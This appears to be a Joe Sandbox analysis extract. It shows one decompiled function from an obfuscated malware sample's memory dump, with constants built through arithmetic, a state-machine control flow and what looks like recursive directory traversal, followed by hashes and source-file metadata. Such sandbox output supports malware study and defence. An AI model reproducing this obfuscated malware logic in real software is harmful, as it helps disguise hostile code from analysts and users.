                                                                                                                                                                            			E02F6437A(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				signed int _v104;
                                                                                                                                                                            				signed int _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				signed int _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				intOrPtr* _v156;
                                                                                                                                                                            				intOrPtr _v168;
                                                                                                                                                                            				char _v228;
                                                                                                                                                                            				short _v772;
                                                                                                                                                                            				short _v774;
                                                                                                                                                                            				char _v776;
                                                                                                                                                                            				signed int _v820;
                                                                                                                                                                            				char _v1340;
                                                                                                                                                                            				char _v1860;
                                                                                                                                                                            				void* _t400;
                                                                                                                                                                            				signed int _t441;
                                                                                                                                                                            				signed int _t445;
                                                                                                                                                                            				intOrPtr _t447;
                                                                                                                                                                            				intOrPtr _t458;
                                                                                                                                                                            				void* _t460;
                                                                                                                                                                            				void* _t508;
                                                                                                                                                                            				signed int _t519;
                                                                                                                                                                            				signed int _t520;
                                                                                                                                                                            				signed int _t521;
                                                                                                                                                                            				signed int _t522;
                                                                                                                                                                            				signed int _t523;
                                                                                                                                                                            				signed int _t524;
                                                                                                                                                                            				signed int _t525;
                                                                                                                                                                            				signed int _t526;
                                                                                                                                                                            				signed int _t527;
                                                                                                                                                                            				signed int _t528;
                                                                                                                                                                            				signed int _t529;
                                                                                                                                                                            				signed int _t530;
                                                                                                                                                                            				signed int _t531;
                                                                                                                                                                            				signed int _t532;
                                                                                                                                                                            				intOrPtr* _t534;
                                                                                                                                                                            				void* _t537;
                                                                                                                                                                            				void* _t538;
                                                                                                                                                                            
                                                                                                                                                                            				_t458 = _a24;
                                                                                                                                                                            				_push(_t458);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_t534 = __ecx;
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_v156 = __ecx;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t400);
                                                                                                                                                                            				_v152 = 0x1ee029;
                                                                                                                                                                            				_t538 = _t537 + 0x20;
                                                                                                                                                                            				_t460 = 0xf0aa094;
                                                                                                                                                                            				_t519 = 0x59;
                                                                                                                                                                            				_v152 = _v152 * 0x53;
                                                                                                                                                                            				_v152 = _v152 ^ 0x0a02ad5b;
                                                                                                                                                                            				_v120 = 0x2e5311;
                                                                                                                                                                            				_v120 = _v120 ^ 0xe660d2f8;
                                                                                                                                                                            				_v120 = _v120 ^ 0xe649fc28;
                                                                                                                                                                            				_v80 = 0x91358;
                                                                                                                                                                            				_v80 = _v80 * 0x29;
                                                                                                                                                                            				_v80 = _v80 | 0x1917a6d7;
                                                                                                                                                                            				_v80 = _v80 ^ 0x197ed78c;
                                                                                                                                                                            				_v96 = 0x864d8a;
                                                                                                                                                                            				_v96 = _v96 * 0x68;
                                                                                                                                                                            				_v96 = _v96 / _t519;
                                                                                                                                                                            				_v96 = _v96 ^ 0x00977d81;
                                                                                                                                                                            				_v104 = 0x73430f;
                                                                                                                                                                            				_t520 = 0x22;
                                                                                                                                                                            				_v104 = _v104 / _t520;
                                                                                                                                                                            				_v104 = _v104 << 7;
                                                                                                                                                                            				_v104 = _v104 ^ 0x01b21e30;
                                                                                                                                                                            				_v128 = 0x2ef155;
                                                                                                                                                                            				_t521 = 0xc;
                                                                                                                                                                            				_v128 = _v128 / _t521;
                                                                                                                                                                            				_v128 = _v128 ^ 0x0005732d;
                                                                                                                                                                            				_v12 = 0x61311f;
                                                                                                                                                                            				_t522 = 0x51;
                                                                                                                                                                            				_v12 = _v12 / _t522;
                                                                                                                                                                            				_v12 = _v12 >> 0xa;
                                                                                                                                                                            				_v12 = _v12 << 9;
                                                                                                                                                                            				_v12 = _v12 ^ 0x00018224;
                                                                                                                                                                            				_v112 = 0x2a9ecd;
                                                                                                                                                                            				_v112 = _v112 << 8;
                                                                                                                                                                            				_v112 = _v112 + 0x4b18;
                                                                                                                                                                            				_v112 = _v112 ^ 0x2a91adfb;
                                                                                                                                                                            				_v44 = 0x8c67a3;
                                                                                                                                                                            				_v44 = _v44 + 0xbf2c;
                                                                                                                                                                            				_t523 = 0x1a;
                                                                                                                                                                            				_v44 = _v44 / _t523;
                                                                                                                                                                            				_v44 = _v44 << 0xc;
                                                                                                                                                                            				_v44 = _v44 ^ 0x56d2d87d;
                                                                                                                                                                            				_v20 = 0xb2272e;
                                                                                                                                                                            				_t524 = 0x6b;
                                                                                                                                                                            				_v20 = _v20 / _t524;
                                                                                                                                                                            				_v20 = _v20 << 5;
                                                                                                                                                                            				_v20 = _v20 + 0xffffd823;
                                                                                                                                                                            				_v20 = _v20 ^ 0x003105de;
                                                                                                                                                                            				_v144 = 0x2b3b33;
                                                                                                                                                                            				_t525 = 0x2b;
                                                                                                                                                                            				_v144 = _v144 * 0x23;
                                                                                                                                                                            				_v144 = _v144 ^ 0x05e29440;
                                                                                                                                                                            				_v52 = 0xfb7274;
                                                                                                                                                                            				_v52 = _v52 + 0xffff2a15;
                                                                                                                                                                            				_v52 = _v52 + 0xffff332b;
                                                                                                                                                                            				_v52 = _v52 >> 9;
                                                                                                                                                                            				_v52 = _v52 ^ 0x000fdf14;
                                                                                                                                                                            				_v88 = 0xc646f0;
                                                                                                                                                                            				_v88 = _v88 >> 1;
                                                                                                                                                                            				_v88 = _v88 + 0xffff0542;
                                                                                                                                                                            				_v88 = _v88 ^ 0x0060230d;
                                                                                                                                                                            				_v136 = 0x21355;
                                                                                                                                                                            				_v136 = _v136 + 0x6ddd;
                                                                                                                                                                            				_v136 = _v136 ^ 0x000c09c4;
                                                                                                                                                                            				_v148 = 0xba736e;
                                                                                                                                                                            				_v148 = _v148 + 0xffff584e;
                                                                                                                                                                            				_v148 = _v148 ^ 0x00bc780c;
                                                                                                                                                                            				_v72 = 0xf06361;
                                                                                                                                                                            				_v72 = _v72 >> 4;
                                                                                                                                                                            				_v72 = _v72 ^ 0xd5eeb61d;
                                                                                                                                                                            				_v72 = _v72 ^ 0xd5e3ba03;
                                                                                                                                                                            				_v68 = 0x39c1e1;
                                                                                                                                                                            				_v68 = _v68 / _t525;
                                                                                                                                                                            				_v68 = _v68 << 0xc;
                                                                                                                                                                            				_v68 = _v68 ^ 0x157dcab9;
                                                                                                                                                                            				_v28 = 0x7b1c58;
                                                                                                                                                                            				_v28 = _v28 + 0x44f9;
                                                                                                                                                                            				_v28 = _v28 + 0xe0d1;
                                                                                                                                                                            				_v28 = _v28 | 0x2c17f99e;
                                                                                                                                                                            				_v28 = _v28 ^ 0x2c795b23;
                                                                                                                                                                            				_v8 = 0x6811e0;
                                                                                                                                                                            				_t526 = 0x7d;
                                                                                                                                                                            				_v8 = _v8 / _t526;
                                                                                                                                                                            				_t527 = 0x6c;
                                                                                                                                                                            				_v8 = _v8 / _t527;
                                                                                                                                                                            				_t528 = 6;
                                                                                                                                                                            				_v8 = _v8 / _t528;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00012ce9;
                                                                                                                                                                            				_v84 = 0x1c9c1b;
                                                                                                                                                                            				_v84 = _v84 ^ 0x05ddd281;
                                                                                                                                                                            				_v84 = _v84 >> 5;
                                                                                                                                                                            				_v84 = _v84 ^ 0x002853b0;
                                                                                                                                                                            				_v76 = 0xb1555b;
                                                                                                                                                                            				_v76 = _v76 << 7;
                                                                                                                                                                            				_v76 = _v76 * 0x47;
                                                                                                                                                                            				_v76 = _v76 ^ 0x9758833c;
                                                                                                                                                                            				_v36 = 0x114b6d;
                                                                                                                                                                            				_v36 = _v36 ^ 0x431dffba;
                                                                                                                                                                            				_v36 = _v36 >> 3;
                                                                                                                                                                            				_v36 = _v36 + 0x181d;
                                                                                                                                                                            				_v36 = _v36 ^ 0x086a5704;
                                                                                                                                                                            				_v60 = 0xa17b63;
                                                                                                                                                                            				_v60 = _v60 ^ 0x190e6497;
                                                                                                                                                                            				_v60 = _v60 ^ 0xa9f7cd41;
                                                                                                                                                                            				_v60 = _v60 << 9;
                                                                                                                                                                            				_v60 = _v60 ^ 0xb1a3277b;
                                                                                                                                                                            				_v24 = 0xc713d;
                                                                                                                                                                            				_v24 = _v24 + 0xc399;
                                                                                                                                                                            				_v24 = _v24 << 4;
                                                                                                                                                                            				_v24 = _v24 + 0xfffffd24;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00d339a4;
                                                                                                                                                                            				_v16 = 0xef5337;
                                                                                                                                                                            				_t529 = 0x2b;
                                                                                                                                                                            				_v16 = _v16 / _t529;
                                                                                                                                                                            				_v16 = _v16 | 0x2bad32d2;
                                                                                                                                                                            				_v16 = _v16 + 0xfffffea2;
                                                                                                                                                                            				_v16 = _v16 ^ 0x2bafb8a8;
                                                                                                                                                                            				_v100 = 0x51ad29;
                                                                                                                                                                            				_v100 = _v100 << 0xd;
                                                                                                                                                                            				_v100 = _v100 ^ 0x8b9fc663;
                                                                                                                                                                            				_v100 = _v100 ^ 0xbe3a4459;
                                                                                                                                                                            				_v92 = 0x2bdd9f;
                                                                                                                                                                            				_t530 = 0x14;
                                                                                                                                                                            				_v92 = _v92 / _t530;
                                                                                                                                                                            				_v92 = _v92 + 0xffff92be;
                                                                                                                                                                            				_v92 = _v92 ^ 0x000ebd35;
                                                                                                                                                                            				_v140 = 0x9e48cc;
                                                                                                                                                                            				_v140 = _v140 << 0xd;
                                                                                                                                                                            				_v140 = _v140 ^ 0xc915160c;
                                                                                                                                                                            				_v108 = 0xd84d8a;
                                                                                                                                                                            				_v108 = _v108 >> 0x10;
                                                                                                                                                                            				_v108 = _v108 >> 0xf;
                                                                                                                                                                            				_v108 = _v108 ^ 0x0004338e;
                                                                                                                                                                            				_v40 = 0xc226eb;
                                                                                                                                                                            				_v40 = _v40 << 2;
                                                                                                                                                                            				_v40 = _v40 + 0xfffff267;
                                                                                                                                                                            				_v40 = _v40 << 0x10;
                                                                                                                                                                            				_v40 = _v40 ^ 0x8e1c4dbd;
                                                                                                                                                                            				_v32 = 0xa8fcf7;
                                                                                                                                                                            				_v32 = _v32 * 0x2f;
                                                                                                                                                                            				_v32 = _v32 / _t530;
                                                                                                                                                                            				_t531 = 0x59;
                                                                                                                                                                            				_v32 = _v32 * 0x62;
                                                                                                                                                                            				_v32 = _v32 ^ 0x9808cd5a;
                                                                                                                                                                            				_v56 = 0xfa54e1;
                                                                                                                                                                            				_v56 = _v56 + 0xffff7ead;
                                                                                                                                                                            				_v56 = _v56 << 6;
                                                                                                                                                                            				_v56 = _v56 / _t531;
                                                                                                                                                                            				_v56 = _v56 ^ 0x00b2c623;
                                                                                                                                                                            				_v132 = 0x7ed953;
                                                                                                                                                                            				_v132 = _v132 ^ 0x188046ff;
                                                                                                                                                                            				_v132 = _v132 ^ 0x18f64c45;
                                                                                                                                                                            				_v124 = 0x5f3094;
                                                                                                                                                                            				_v124 = _v124 ^ 0xdd2f4899;
                                                                                                                                                                            				_v124 = _v124 ^ 0xdd733dae;
                                                                                                                                                                            				_v48 = 0x3fdd04;
                                                                                                                                                                            				_v48 = _v48 + 0xdca9;
                                                                                                                                                                            				_v48 = _v48 ^ 0x51a2bdec;
                                                                                                                                                                            				_v48 = _v48 + 0xffffe9fd;
                                                                                                                                                                            				_v48 = _v48 ^ 0x51eeddfc;
                                                                                                                                                                            				_v116 = 0x86a662;
                                                                                                                                                                            				_t532 = 0x3e;
                                                                                                                                                                            				_t533 = _v156;
                                                                                                                                                                            				_v116 = _v116 / _t532;
                                                                                                                                                                            				_v116 = _v116 * 0x73;
                                                                                                                                                                            				_v116 = _v116 ^ 0x00fd398d;
                                                                                                                                                                            				_v64 = 0x72f53e;
                                                                                                                                                                            				_v64 = _v64 + 0x31db;
                                                                                                                                                                            				_v64 = _v64 >> 6;
                                                                                                                                                                            				_v64 = _v64 + 0xffff6dcd;
                                                                                                                                                                            				_v64 = _v64 ^ 0x0003149a;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t508 = 0x2e;
                                                                                                                                                                            					L2:
                                                                                                                                                                            					while(_t460 != 0x9b6cb5) {
                                                                                                                                                                            						if(_t460 == 0x44804ea) {
                                                                                                                                                                            							__eflags = _v820 & _v152;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								_t445 =  *_t534( &_v820,  &_v228);
                                                                                                                                                                            								asm("sbb ecx, ecx");
                                                                                                                                                                            								_t460 = ( ~_t445 & 0xfb5d1634) + 0x53e5681;
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									_t508 = 0x2e;
                                                                                                                                                                            									goto L2;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v776 - _t508;
                                                                                                                                                                            							if(_v776 != _t508) {
                                                                                                                                                                            								L18:
                                                                                                                                                                            								__eflags = _a16;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_push(_v28);
                                                                                                                                                                            									_push(_v68);
                                                                                                                                                                            									_push(_v72);
                                                                                                                                                                            									E02F72D0A(_v84, __eflags,  &_v776, _v76, _v36, _v60, E02F516DC,  &_v1860, _t458, E02F6E1F8(E02F516DC, _v148, __eflags));
                                                                                                                                                                            									E02F6437A(_v156, _v24, _v16, _v100, _v92, _a16, _a20,  &_v1860);
                                                                                                                                                                            									_t447 = E02F6FECB(_t452, _v140, _v108, _v40, _v32);
                                                                                                                                                                            									_t534 = _v156;
                                                                                                                                                                            									_t538 = _t538 + 0x50;
                                                                                                                                                                            									_t508 = 0x2e;
                                                                                                                                                                            								}
                                                                                                                                                                            								L17:
                                                                                                                                                                            								_t460 = 0x9b6cb5;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v774;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								goto L17;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v774 - _t508;
                                                                                                                                                                            							if(_v774 != _t508) {
                                                                                                                                                                            								goto L18;
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _v772;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								goto L18;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t460 == 0x481089e) {
                                                                                                                                                                            							_t447 = E02F62DA7( &_v820, _v88, _v136,  &_v1340);
                                                                                                                                                                            							_t533 = _t447;
                                                                                                                                                                            							__eflags = _t447 - 0xffffffff;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								return _t447;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t460 = 0x44804ea;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t508 = 0x2e;
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t460 == 0x53e5681) {
                                                                                                                                                                            							return E02F5BEA1(_v116, _v64, _t533);
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t460 == 0xeb5715f) {
                                                                                                                                                                            							_push(_v104);
                                                                                                                                                                            							_push(_v96);
                                                                                                                                                                            							_push(_v80);
                                                                                                                                                                            							E02F62C9C(_v12, __eflags, E02F6E1F8(0x2f5167c, _v120, __eflags),  &_v1340, 0x2f5167c, _v112, _t458);
                                                                                                                                                                            							_t447 = E02F6FECB(_t449, _v44, _v20, _v144, _v52);
                                                                                                                                                                            							_t534 = _v156;
                                                                                                                                                                            							_t538 = _t538 + 0x2c;
                                                                                                                                                                            							_t460 = 0x481089e;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t508 = 0x2e;
                                                                                                                                                                            								goto L2;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t460 != 0xf0aa094) {
                                                                                                                                                                            							L24:
                                                                                                                                                                            							__eflags = _t460 - 0x41075ad;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							return _t447;
                                                                                                                                                                            						}
                                                                                                                                                                            						_v168 = _t458;
                                                                                                                                                                            						_t460 = 0xeb5715f;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t441 = E02F70F1E(_v56, _v132,  &_v820, _v124, _v48, _t533);
                                                                                                                                                                            					_t538 = _t538 + 0x10;
                                                                                                                                                                            					__eflags = _t441;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						_t460 = 0x44804ea;
                                                                                                                                                                            						_t508 = 0x2e;
                                                                                                                                                                            						goto L24;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t460 = 0x53e5681;
                                                                                                                                                                            				}
                                                                                                                                                                            			}









































































                                                                                                                                                                            0x02f64384
                                                                                                                                                                            0x02f64389
                                                                                                                                                                            0x02f6438a
                                                                                                                                                                            0x02f6438d
                                                                                                                                                                            0x02f6438f
                                                                                                                                                                            0x02f64392
                                                                                                                                                                            0x02f64398
                                                                                                                                                                            0x02f6439b
                                                                                                                                                                            0x02f6439e
                                                                                                                                                                            0x02f643a1
                                                                                                                                                                            0x02f643a2
                                                                                                                                                                            0x02f643a3
                                                                                                                                                                            0x02f643a8
                                                                                                                                                                            0x02f643b2
                                                                                                                                                                            0x02f643be
                                                                                                                                                                            0x02f643c5
                                                                                                                                                                            0x02f643c6
                                                                                                                                                                            0x02f643cc
                                                                                                                                                                            0x02f643d6
                                                                                                                                                                            0x02f643dd
                                                                                                                                                                            0x02f643e4
                                                                                                                                                                            0x02f643eb
                                                                                                                                                                            0x02f643f8
                                                                                                                                                                            0x02f643fb
                                                                                                                                                                            0x02f64402
                                                                                                                                                                            0x02f64409
                                                                                                                                                                            0x02f64414
                                                                                                                                                                            0x02f6441e
                                                                                                                                                                            0x02f64421
                                                                                                                                                                            0x02f64428
                                                                                                                                                                            0x02f64432
                                                                                                                                                                            0x02f64437
                                                                                                                                                                            0x02f6443c
                                                                                                                                                                            0x02f64440
                                                                                                                                                                            0x02f64447
                                                                                                                                                                            0x02f64451
                                                                                                                                                                            0x02f64456
                                                                                                                                                                            0x02f6445b
                                                                                                                                                                            0x02f64462
                                                                                                                                                                            0x02f6446c
                                                                                                                                                                            0x02f64471
                                                                                                                                                                            0x02f64476
                                                                                                                                                                            0x02f6447a
                                                                                                                                                                            0x02f6447e
                                                                                                                                                                            0x02f64485
                                                                                                                                                                            0x02f6448c
                                                                                                                                                                            0x02f64490
                                                                                                                                                                            0x02f64497
                                                                                                                                                                            0x02f6449e
                                                                                                                                                                            0x02f644a5
                                                                                                                                                                            0x02f644af
                                                                                                                                                                            0x02f644b2
                                                                                                                                                                            0x02f644b5
                                                                                                                                                                            0x02f644b9
                                                                                                                                                                            0x02f644c0
                                                                                                                                                                            0x02f644ce
                                                                                                                                                                            0x02f644d3
                                                                                                                                                                            0x02f644d8
                                                                                                                                                                            0x02f644dc
                                                                                                                                                                            0x02f644e3
                                                                                                                                                                            0x02f644ea
                                                                                                                                                                            0x02f644fb
                                                                                                                                                                            0x02f644fe
                                                                                                                                                                            0x02f64504
                                                                                                                                                                            0x02f6450e
                                                                                                                                                                            0x02f64515
                                                                                                                                                                            0x02f6451c
                                                                                                                                                                            0x02f64523
                                                                                                                                                                            0x02f64527
                                                                                                                                                                            0x02f6452e
                                                                                                                                                                            0x02f64535
                                                                                                                                                                            0x02f64538
                                                                                                                                                                            0x02f6453f
                                                                                                                                                                            0x02f64546
                                                                                                                                                                            0x02f64550
                                                                                                                                                                            0x02f6455a
                                                                                                                                                                            0x02f64564
                                                                                                                                                                            0x02f6456e
                                                                                                                                                                            0x02f64578
                                                                                                                                                                            0x02f64582
                                                                                                                                                                            0x02f64589
                                                                                                                                                                            0x02f6458d
                                                                                                                                                                            0x02f64594
                                                                                                                                                                            0x02f6459b
                                                                                                                                                                            0x02f645a9
                                                                                                                                                                            0x02f645ac
                                                                                                                                                                            0x02f645b0
                                                                                                                                                                            0x02f645b7
                                                                                                                                                                            0x02f645be
                                                                                                                                                                            0x02f645c5
                                                                                                                                                                            0x02f645cc
                                                                                                                                                                            0x02f645d3
                                                                                                                                                                            0x02f645da
                                                                                                                                                                            0x02f645e4
                                                                                                                                                                            0x02f645e9
                                                                                                                                                                            0x02f645f1
                                                                                                                                                                            0x02f645f6
                                                                                                                                                                            0x02f645fe
                                                                                                                                                                            0x02f64601
                                                                                                                                                                            0x02f64604
                                                                                                                                                                            0x02f6460b
                                                                                                                                                                            0x02f64612
                                                                                                                                                                            0x02f64619
                                                                                                                                                                            0x02f6461d
                                                                                                                                                                            0x02f64624
                                                                                                                                                                            0x02f6462b
                                                                                                                                                                            0x02f64633
                                                                                                                                                                            0x02f64636
                                                                                                                                                                            0x02f6463d
                                                                                                                                                                            0x02f64644
                                                                                                                                                                            0x02f6464b
                                                                                                                                                                            0x02f6464f
                                                                                                                                                                            0x02f64656
                                                                                                                                                                            0x02f6465d
                                                                                                                                                                            0x02f64664
                                                                                                                                                                            0x02f6466d
                                                                                                                                                                            0x02f64674
                                                                                                                                                                            0x02f64678
                                                                                                                                                                            0x02f6467f
                                                                                                                                                                            0x02f64686
                                                                                                                                                                            0x02f6468d
                                                                                                                                                                            0x02f64691
                                                                                                                                                                            0x02f64698
                                                                                                                                                                            0x02f6469f
                                                                                                                                                                            0x02f646ab
                                                                                                                                                                            0x02f646b0
                                                                                                                                                                            0x02f646b3
                                                                                                                                                                            0x02f646ba
                                                                                                                                                                            0x02f646c1
                                                                                                                                                                            0x02f646c8
                                                                                                                                                                            0x02f646cf
                                                                                                                                                                            0x02f646d3
                                                                                                                                                                            0x02f646da
                                                                                                                                                                            0x02f646e1
                                                                                                                                                                            0x02f646ed
                                                                                                                                                                            0x02f646f2
                                                                                                                                                                            0x02f646f5
                                                                                                                                                                            0x02f646fc
                                                                                                                                                                            0x02f64703
                                                                                                                                                                            0x02f6470d
                                                                                                                                                                            0x02f64714
                                                                                                                                                                            0x02f6471e
                                                                                                                                                                            0x02f64725
                                                                                                                                                                            0x02f64729
                                                                                                                                                                            0x02f6472d
                                                                                                                                                                            0x02f64734
                                                                                                                                                                            0x02f6473b
                                                                                                                                                                            0x02f6473f
                                                                                                                                                                            0x02f64746
                                                                                                                                                                            0x02f6474a
                                                                                                                                                                            0x02f64751
                                                                                                                                                                            0x02f6475e
                                                                                                                                                                            0x02f64768
                                                                                                                                                                            0x02f6476f
                                                                                                                                                                            0x02f64772
                                                                                                                                                                            0x02f64775
                                                                                                                                                                            0x02f6477c
                                                                                                                                                                            0x02f64783
                                                                                                                                                                            0x02f6478a
                                                                                                                                                                            0x02f64795
                                                                                                                                                                            0x02f64798
                                                                                                                                                                            0x02f6479f
                                                                                                                                                                            0x02f647a6
                                                                                                                                                                            0x02f647ad
                                                                                                                                                                            0x02f647b4
                                                                                                                                                                            0x02f647bb
                                                                                                                                                                            0x02f647c2
                                                                                                                                                                            0x02f647c9
                                                                                                                                                                            0x02f647d0
                                                                                                                                                                            0x02f647d7
                                                                                                                                                                            0x02f647de
                                                                                                                                                                            0x02f647e5
                                                                                                                                                                            0x02f647ec
                                                                                                                                                                            0x02f647f6
                                                                                                                                                                            0x02f647f9
                                                                                                                                                                            0x02f647ff
                                                                                                                                                                            0x02f64806
                                                                                                                                                                            0x02f64809
                                                                                                                                                                            0x02f64810
                                                                                                                                                                            0x02f64817
                                                                                                                                                                            0x02f6481e
                                                                                                                                                                            0x02f64822
                                                                                                                                                                            0x02f64829
                                                                                                                                                                            0x02f64830
                                                                                                                                                                            0x02f64832
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64833
                                                                                                                                                                            0x02f64845
                                                                                                                                                                            0x02f6491b
                                                                                                                                                                            0x02f64921
                                                                                                                                                                            0x02f649f9
                                                                                                                                                                            0x02f649ff
                                                                                                                                                                            0x02f64a07
                                                                                                                                                                            0x02f64830
                                                                                                                                                                            0x02f64832
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64832
                                                                                                                                                                            0x02f64830
                                                                                                                                                                            0x02f64927
                                                                                                                                                                            0x02f6492e
                                                                                                                                                                            0x02f64957
                                                                                                                                                                            0x02f64957
                                                                                                                                                                            0x02f6495b
                                                                                                                                                                            0x02f6495d
                                                                                                                                                                            0x02f64965
                                                                                                                                                                            0x02f64968
                                                                                                                                                                            0x02f6499b
                                                                                                                                                                            0x02f649bf
                                                                                                                                                                            0x02f649d5
                                                                                                                                                                            0x02f649da
                                                                                                                                                                            0x02f649e0
                                                                                                                                                                            0x02f649e5
                                                                                                                                                                            0x02f649e5
                                                                                                                                                                            0x02f6494d
                                                                                                                                                                            0x02f6494d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6494d
                                                                                                                                                                            0x02f64930
                                                                                                                                                                            0x02f64938
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6493a
                                                                                                                                                                            0x02f64941
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64943
                                                                                                                                                                            0x02f6494b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6494b
                                                                                                                                                                            0x02f64851
                                                                                                                                                                            0x02f648f9
                                                                                                                                                                            0x02f648fe
                                                                                                                                                                            0x02f64902
                                                                                                                                                                            0x02f64905
                                                                                                                                                                            0x02f64a65
                                                                                                                                                                            0x02f64a65
                                                                                                                                                                            0x02f6490b
                                                                                                                                                                            0x02f64830
                                                                                                                                                                            0x02f64832
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64832
                                                                                                                                                                            0x02f64830
                                                                                                                                                                            0x02f6485d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64a5e
                                                                                                                                                                            0x02f64869
                                                                                                                                                                            0x02f64884
                                                                                                                                                                            0x02f6488c
                                                                                                                                                                            0x02f6488f
                                                                                                                                                                            0x02f648b2
                                                                                                                                                                            0x02f648cb
                                                                                                                                                                            0x02f648d0
                                                                                                                                                                            0x02f648d6
                                                                                                                                                                            0x02f648d9
                                                                                                                                                                            0x02f64830
                                                                                                                                                                            0x02f64832
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64832
                                                                                                                                                                            0x02f64830
                                                                                                                                                                            0x02f64871
                                                                                                                                                                            0x02f64a44
                                                                                                                                                                            0x02f64a44
                                                                                                                                                                            0x02f64a4a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64a4a
                                                                                                                                                                            0x02f64877
                                                                                                                                                                            0x02f6487d
                                                                                                                                                                            0x02f6487d
                                                                                                                                                                            0x02f64a26
                                                                                                                                                                            0x02f64a2b
                                                                                                                                                                            0x02f64a2e
                                                                                                                                                                            0x02f64a30
                                                                                                                                                                            0x02f64a3e
                                                                                                                                                                            0x02f64a43
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f64a43
                                                                                                                                                                            0x02f64a32
                                                                                                                                                                            0x02f64a32

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #`$#[y,$3;+$7S
                                                                                                                                                                            • API String ID: 0-3740457175
                                                                                                                                                                            • Opcode ID: 38976a9b1bc8eabb0147936dbd446eea0852215f6d98893c5c13b507821d4330
                                                                                                                                                                            • Instruction ID: c31d495272a3d141ea73a34b379d0fc0bec229d761a3e66f1ff656b302311a2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 38976a9b1bc8eabb0147936dbd446eea0852215f6d98893c5c13b507821d4330
